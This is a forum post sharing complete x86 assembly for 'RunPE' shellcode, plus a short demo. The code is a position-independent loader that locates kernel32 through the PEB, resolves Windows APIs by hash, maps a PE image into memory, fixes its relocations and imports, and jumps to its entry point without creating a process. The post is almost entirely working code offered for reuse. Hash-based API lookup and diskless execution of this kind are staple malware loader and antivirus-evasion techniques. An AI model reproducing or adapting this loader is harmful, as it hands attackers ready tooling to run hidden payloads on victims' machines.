Nytro Posted August 12, 2014 Report Posted August 12, 2014 [h=5][asm x86] RunPE shellcode[/h]use32format binaryinclude 'win32a.inc'include 'pe.inc'struct stAPITable pVirtualAllocEx_kernel32 dd ? pLoadLibraryA_kernel32 dd ? pVirtualProtect_kernel32 dd ?endsproc _GetDeltaProc, pPEImage stdcall RunPE_main, [pPEImage] .Delta: retendpproc RunPE_main pPEImage local pFileHeader:DWORD local pNewPEPlace:DWORD local APITable[0x14]:BYTE local pAPITable:DWORD local iResult:DWORD local huser32:DWORD local szuser32[0xb]:BYTE local pGetHashSz:DWORD local hkernel32:DWORD push edi push ecx push eax mov eax, [ebp+04h] sub eax, _GetDeltaProc.Delta push eax pop ebx lea ebx, [ebx+GetHashSz] push ebx pop DWord [pGetHashSz] call GetK32 mov DWord [hkernel32], eax stdcall AltGetProcAddressByHash, [hkernel32], ebx, 0x632466f0 mov DWord [APITable+stAPITable.pVirtualAllocEx_kernel32], eax stdcall AltGetProcAddressByHash, [hkernel32], ebx, 0x15f8ef80 mov DWord [APITable+stAPITable.pVirtualProtect_kernel32], eax stdcall AltGetProcAddressByHash, [hkernel32], ebx, 0x71e40722 mov DWord [APITable+stAPITable.pLoadLibraryA_kernel32], eax lea ecx, [APITable] mov DWord [pAPITable], ecx stdcall verifyPE, [pPEImage] cmp eax, 0x0 jz .End push eax pop DWord [pFileHeader] stdcall DWord [APITable+stAPITable.pVirtualAllocEx_kernel32], -1, NULL, DWord [eax+IMAGE_OPTIONAL_HEADER32.SizeOfImage+sizeof.IMAGE_FILE_HEADER],\ MEM_COMMIT or MEM_RESERVE or MEM_TOP_DOWN, PAGE_READWRITE mov [pNewPEPlace], eax stdcall loadFile, [pAPITable], [pFileHeader], [pPEImage], [pNewPEPlace] stdcall loadImportTable, [pAPITable], [pGetHashSz], [pNewPEPlace] test eax, eax jz .End stdcall reloc_fixup, [pNewPEPlace], [pFileHeader] stdcall setPermissions, [pAPITable], [pFileHeader], [pPEImage], [pNewPEPlace] mov esi, [pFileHeader] mov eax, [esi+sizeof.IMAGE_FILE_HEADER+IMAGE_OPTIONAL_HEADER32.AddressOfEntryPoint] add eax, [pNewPEPlace] jmp eax.End: pop eax pop ecx pop edi mov eax, DWord [iResult] retendpproc verifyPE pImagePE local iResult:DWORD pusha push DWord [pImagePE] pop edx cmp Word [edx], WORD 0x5a4d jnz .Exit mov ecx, DWord [edx+IMAGE_DOS_HEADER.e_lfanew] add edx, ecx cmp DWord [edx], DWORD 0x4550 jne .Exit lea edx, [edx+0x4].Exit: mov DWord [iResult], edx popa push DWord [iResult] pop eax retendpproc loadSection pImageSectionHeader:DWORD, pImageBase:DWORD, pBase:DWORD pushad mov edx, [pImageSectionHeader] mov esi, [pImageBase] add esi, [edx+IMAGE_SECTION_HEADER.PointerToRawData] mov edi, [edx+IMAGE_SECTION_HEADER.VirtualAddress] add edi, [pBase] mov ecx, [edx+IMAGE_SECTION_HEADER.SizeOfRawData] cld rep movsb popad retendpproc loadFile pAPITable:DWORD, pImageFileHeader:DWORD, pImageBase, pBase:DWORDlocal .iSectNum:DWORD, .pImageBase:DWORD, .pImageOptionalHeader:DWORD, .pSectionHeaders:DWORD, .iPEHeaderSize:DWORD pushad mov edx, [pImageFileHeader] movzx eax, Word [edx+IMAGE_FILE_HEADER.NumberOfSections] mov [.iSectNum], eax lea edx, [edx+sizeof.IMAGE_FILE_HEADER] lea ebx, [edx + IMAGE_OPTIONAL_HEADER32.DataDirectory] mov eax, [edx + IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes] mov edx, sizeof.IMAGE_DATA_DIRECTORY mul edx add eax, ebx mov [.pSectionHeaders], eax mov eax, sizeof.IMAGE_SECTION_HEADER mov edx, [.iSectNum] mul edx add eax, [.pSectionHeaders] sub eax, [pImageBase] mov ecx, eax mov edi, [pBase] mov esi, [pImageBase] rep movsb mov ecx, [.iSectNum] mov ebx, [.pSectionHeaders].load_section_loop: stdcall loadSection, ebx, [pImageBase], [pBase] add ebx, sizeof.IMAGE_SECTION_HEADER dec ecx jnz .load_section_loop.Exit: popad retendp proc setPermissions APITable:DWORD, pImageFileHeader:DWORD, pImageBase:DWORD, pBase:DWORD local .number_of_sections:DWORD, .image_base:DWORD, .section_headers:DWORD, .pe_header_size:DWORD, .vprotect_ret:DWORD, .retval:DWORD pushad xor eax, eax mov [.retval], eax mov edx, [pImageFileHeader] movzx eax, Word [edx+IMAGE_FILE_HEADER.NumberOfSections] mov [.number_of_sections], eax add edx, sizeof.IMAGE_FILE_HEADER mov eax, [edx+IMAGE_OPTIONAL_HEADER32.ImageBase] mov [.image_base], eax lea ebx, [edx+IMAGE_OPTIONAL_HEADER32.DataDirectory] mov eax, [edx+IMAGE_OPTIONAL_HEADER32.NumberOfRvaAndSizes] mov edx, sizeof.IMAGE_DATA_DIRECTORY mul edx add eax, ebx mov [.section_headers], eax mov eax, sizeof.IMAGE_SECTION_HEADER mov edx, [.number_of_sections] mul edx add eax, [.section_headers] mov ebx, [pImageBase] sub eax, ebx mov [.pe_header_size], eax mov edx, [APITable] lea eax, [.vprotect_ret] stdcall dword [edx+stAPITable.pVirtualProtect_kernel32], [pBase], [.pe_header_size], PAGE_READONLY, eax test eax, eax jz .exit mov ecx, [.number_of_sections] mov ebx, [.section_headers].load_section_loop: stdcall setSection, [APITable], ebx, [pBase], [pImageBase] test eax, eax jz .exit add ebx, sizeof.IMAGE_SECTION_HEADER loop .load_section_loop inc [.retval].exit: popad mov eax, [.retval] retendpproc setSection APITable:DWORD, pSectionHeader:DWORD, pBase:DWORD, pImageBase:DWORDlocal .section_flags:DWORD, .retval:DWORD, .vprotect_ret:DWORD pushad xor ebx, ebx mov [.retval], ebx mov edx, [pSectionHeader];section execute/read/write? mov ebx, [edx+IMAGE_SECTION_HEADER.Characteristics] and ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE cmp ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE jne .no_execute_read_write mov eax, PAGE_EXECUTE_READWRITE mov [.section_flags],eax jmp .set_memory.no_execute_read_write: mov ebx, [edx+IMAGE_SECTION_HEADER.Characteristics] and ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ cmp ebx, IMAGE_SCN_MEM_EXECUTE or IMAGE_SCN_MEM_READ jne .no_execute_read mov eax, PAGE_EXECUTE_READ mov [.section_flags],eax jmp .set_memory.no_execute_read: mov ebx, [edx+IMAGE_SECTION_HEADER.Characteristics] and ebx, IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE cmp ebx, IMAGE_SCN_MEM_READ or IMAGE_SCN_MEM_WRITE jne .no_read_write mov eax, PAGE_READWRITE mov [.section_flags], eax jmp .set_memory.no_read_write: mov ebx, [edx+IMAGE_SECTION_HEADER.Characteristics] and ebx, IMAGE_SCN_MEM_READ cmp ebx, IMAGE_SCN_MEM_READ jne .no_read mov eax, PAGE_READONLY mov [.section_flags], eax jmp .set_memory.no_read: mov eax, PAGE_NOACCESS mov [.section_flags],eax.set_memory: mov edx, [pSectionHeader] mov eax, [edx + IMAGE_SECTION_HEADER.VirtualAddress] add eax, [pBase] mov ecx, [APITable] lea edi, [.vprotect_ret] stdcall DWord [ecx + stAPITable.pVirtualProtect_kernel32], eax, [edx + IMAGE_SECTION_HEADER.VirtualSize], [.section_flags], edi test eax, eax jz .Exit inc [.retval].Exit: popad mov eax, [.retval] retendpproc GetNtdll local iResult:DWORD push edi push esi push ebx push DWord [fs:0x30] pop edi mov esi, DWord [edi+0xC] push DWord [esi+0x1C] pop ebx push DWord [ebx+0x8] pop DWord [iResult] pop ebx pop esi pop edi mov eax, DWord [iResult] retendpproc GetK32 local iResult:DWORD pusha mov ecx, DWord [fs:0x30] mov edi, DWord [ecx+0xC] mov edi, DWord [edi+0x1C].NextModule: push DWord [edi+0x8] pop DWord [iResult] push DWord [edi+0x20] pop ebx mov edi, DWord [edi] movzx eax, Byte [ebx+0x18] test eax, eax jne .NextModule movzx eax, Byte [ebx] cmp eax, 0x4b je .Found_K32 cmp eax, 0x6b jne .NextModule.Found_K32: popa push DWord [iResult] pop eax retendpproc GetHashSz strz push edx push ecx mov edx, DWord [strz] push DWORD 0x0 pop ecx push ecx.CalcHash: ror ecx, 7 xor [esp], ecx mov cl, Byte [edx] lea edx, [edx+0x1] test cl, cl jnz .CalcHash pop eax pop ecx pop edx retendpproc AltGetProcAddressByHash hLib, fHashProc, iHashVal local iResult:DWORD pusha push DWORD 0x0 pop DWord [iResult] push DWord [hLib] pop esi movzx ecx, Word [esi] cmp ecx, 0x5a4d jne .End movzx edi, Word [esi+0x3c] add edi, esi cmp DWord [edi], DWORD 0x4550 jne .End push DWord [edi+0x78] pop ecx add ecx, esi mov ebx, DWord [ecx+0x18] push ecx push 0x0 pop edx push DWord [ecx+0x20] pop eax lea eax, [esi+eax].MainLoop: push DWord [eax] pop edi add edi, esi push eax stdcall [fHashProc], edi cmp eax, DWord [iHashVal] pop eax jz .FoundProcname lea eax, [eax+0x4] lea edx, [edx+0x1] sub ebx, 0x1 or ebx, ebx jnz .MainLoop pop ecx jmp .End.FoundProcname: pop edi shl edx, 1 add edx, DWord [edi+0x24] movzx eax, Word [edx+esi] shl eax, 2 add eax, esi add eax, DWord [edi+0x1C] mov ebx, DWord [eax] lea ebx, [esi+ebx] push ebx pop DWord [iResult].End: popa push DWord [iResult] pop eax retendpxReloc = sizeof.IMAGE_FILE_HEADER+IMAGE_OPTIONAL_HEADER32.DataDirectory+0x8*IMAGE_DIRECTORY_ENTRY_BASERELOCproc reloc_fixup, dwImageBase:DWORD, pImageFileHeader:DWORD pusha mov edx, [dwImageBase] mov ebx, [pImageFileHeader] mov ebx, [ebx + sizeof.IMAGE_FILE_HEADER + IMAGE_OPTIONAL_HEADER32.ImageBase] sub edx, ebx ; edx -> reloc_correction // delta_ImageBase je .end test ebx, ebx jz .end mov eax, [pImageFileHeader] mov ebx, [eax+xReloc] add ebx, [dwImageBase].block: mov eax, [ebx + 04h] ; ImageBaseRelocation.SizeOfBlock test eax, eax jz .end lea ecx, [eax - 008h] shr ecx, 001h lea edi, [ebx + 008h].do_entry: movzx eax, word [edi] ; Entry push edx mov edx, eax shr eax, 00Ch ; Type = Entry >> 12 mov esi, [dwImageBase] ; ImageBase and dx, 0FFFh add esi, [ebx] add esi, edx pop edx.HIGH: ; IMAGE_REL_BASED_HIGH dec eax jnz .LOW mov eax, edx shr eax, 010h ; HIWORD(Delta) jmp .LOW_fixup .LOW: ; IMAGE_REL_BASED_LOW dec eax jnz .HIGHLOW movzx eax, dx ; LOWORD(Delta).LOW_fixup: add word [esi], ax ; mem[x] = mem[x] + delta_ImageBase jmp .next_entry .HIGHLOW: ; IMAGE_REL_BASED_HIGHLOW dec eax jnz .next_entry add [esi],edx ; mem[x] = mem[x] + delta_ImageBase.next_entry: inc edi inc edi ; Entry++ loop .do_entry.next_base: add ebx, [ebx + 004h] jmp .block.end: popa retendpproc loadImportTable APITable:DWORD, pHashProc:DWORD, image_base:DWORDlocal .import_table:DWORD, .null_directory_entry[sizeof.IMAGE_IMPORT_DESCRIPTOR]:BYTE, .retval:DWORD pushad xor eax, eax inc eax mov [.retval], eax mov edx, [image_base] mov eax, [edx + IMAGE_DOS_HEADER.e_lfanew] lea eax, [edx + eax + 4 + sizeof.IMAGE_FILE_HEADER+IMAGE_OPTIONAL_HEADER32.DataDirectory+sizeof.IMAGE_DATA_DIRECTORY] mov eax, [eax+IMAGE_DATA_DIRECTORY.VirtualAddress] add eax, edx mov [.import_table],eax lea edi, [.null_directory_entry] mov ecx, sizeof.IMAGE_IMPORT_DESCRIPTOR mov al, 0h rep stosb mov ebx, [.import_table].next_directory_entry: lea esi, [.null_directory_entry] mov edi, ebx mov ecx, sizeof.IMAGE_IMPORT_DESCRIPTOR rep cmpsb je .exit_success stdcall loadImportDirectoryTable, [APITable], [pHashProc], [image_base], ebx test eax, eax jz .exit_error add ebx, sizeof.IMAGE_IMPORT_DESCRIPTOR jmp .next_directory_entry.exit_success: inc [.retval].exit_error: popad mov eax, [.retval] retendpproc loadImportDirectoryTable APITable:DWORD, pHashProc:DWORD, image_base:DWORD, directory_entry:DWORD local .lookup_table:DWORD, .import_address_table:DWORD, .dll_image_base:DWORD pushad mov eax, [directory_entry] mov eax, [eax+IMAGE_IMPORT_DESCRIPTOR.Name_] add eax, [image_base] ;load the corresponding dll mov ebx, [APITable] stdcall DWord [ebx+stAPITable.pLoadLibraryA_kernel32], eax test eax,eax jz .exit_error mov [.dll_image_base],eax mov edx, [directory_entry] mov eax, [edx+IMAGE_IMPORT_DESCRIPTOR.OriginalFirstThunk] add eax, [image_base] mov [.lookup_table], eax mov eax, [edx+IMAGE_IMPORT_DESCRIPTOR.FirstThunk] add eax, [image_base] mov [.import_address_table],eax xor ecx, ecx.next_lookup_entry: mov eax, [.lookup_table] add eax, ecx mov eax, [eax] test eax,eax jz .exit_success mov ebx, eax and eax, IMAGE_ORDINAL_FLAG32 jnz .exit_error.byname: add ebx, [image_base] lea ebx, [ebx+IMAGE_IMPORT_BY_NAME.Name_] mov eax, ebx push ecx stdcall GetHashSz, ebx stdcall AltGetProcAddressByHash, [.dll_image_base], [pHashProc], eax pop ecx test eax, eax jz .exit_error mov ebx, [.import_address_table] add ebx, ecx mov [ebx], eax add ecx, 4 jmp .next_lookup_entry.exit_success: popad mov eax,1 ret.exit_error: popad mov eax,0 retendpdd _GetDeltaProcThis shellcode can run pe in memory without CreateProcess API. EXE MUST have relocation table. It get only one parameter - pointer to PE ImageFor showing how it works I added simple demo.use32format PE GUI 4.0include 'win32a.inc'include 'pe.inc'entry startsection '.code' code readable writeable executableRunPE:file 'RunPE.bin'start:stdcall RunPE, PEFILEPEFILE:file 'stored_exe.bin'Sursa: https://evilzone.org/code-library/%28asm-x86%29-runpe-shellcode/ Quote